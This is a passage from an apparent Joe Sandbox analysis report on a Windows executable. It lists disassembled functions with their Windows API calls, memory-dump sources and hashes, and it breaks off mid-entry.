                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetParent.USER32(?), ref: 00444633
                                                                                                • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                • String ID:
                                                                                                • API String ID: 87235514-0
                                                                                                • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                • DeleteObject.GDI32(?), ref: 00455736
                                                                                                • DeleteObject.GDI32(?), ref: 00455744
                                                                                                • DestroyIcon.USER32(?), ref: 00455752
                                                                                                • DestroyWindow.USER32(?), ref: 00455760
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2354583917-0
                                                                                                • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                Function 00464812 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 145libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                • String ID: #v
                                                                                                • API String ID: 2449869053-554117064
                                                                                                • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                • String ID:
                                                                                                • API String ID: 896007046-0
                                                                                                • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                • GetFocus.USER32 ref: 00448ACF
                                                                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3429747543-0
                                                                                                • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                Function 00401250 Relevance: 10.6, APIs: 7, Instructions: 86windowtimeCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                                                  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                                                  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                                                • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                                                • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                                                • String ID:
                                                                                                • API String ID: 3300667738-0
                                                                                                • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                                                • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                                                • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                                                Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                • String ID: %lu$\VH
                                                                                                • API String ID: 3164766367-2432546070
                                                                                                • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Msctls_Progress32
                                                                                                • API String ID: 3850602802-3636473452
                                                                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                                                                                Function 00455531 Relevance: 10.6, APIs: 7, Instructions: 75windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                                                                • String ID:
                                                                                                • API String ID: 3985565216-0
                                                                                                • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                                                                • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                                                                • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                                                                Function 0041F6F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 0041F707
                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                • _free.LIBCMT ref: 0041F71A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID: [B
                                                                                                • API String ID: 1020059152-632041663
                                                                                                • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                                                                • Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                                                                                                • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                                                                Function 00413D7F Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                                                                • __calloc_crt.LIBCMT ref: 00413DB0
                                                                                                • __getptd.LIBCMT ref: 00413DBD
                                                                                                • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                                                                • _free.LIBCMT ref: 00413E07
                                                                                                • __dosmaperr.LIBCMT ref: 00413E12
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 155776804-0
                                                                                                • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                                                                • Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                                                                                                • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                                                                Function 00436C6E Relevance: 10.5, APIs: 7, Instructions: 49threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                                                                  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                                                                • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                                                                Memory Dump Source
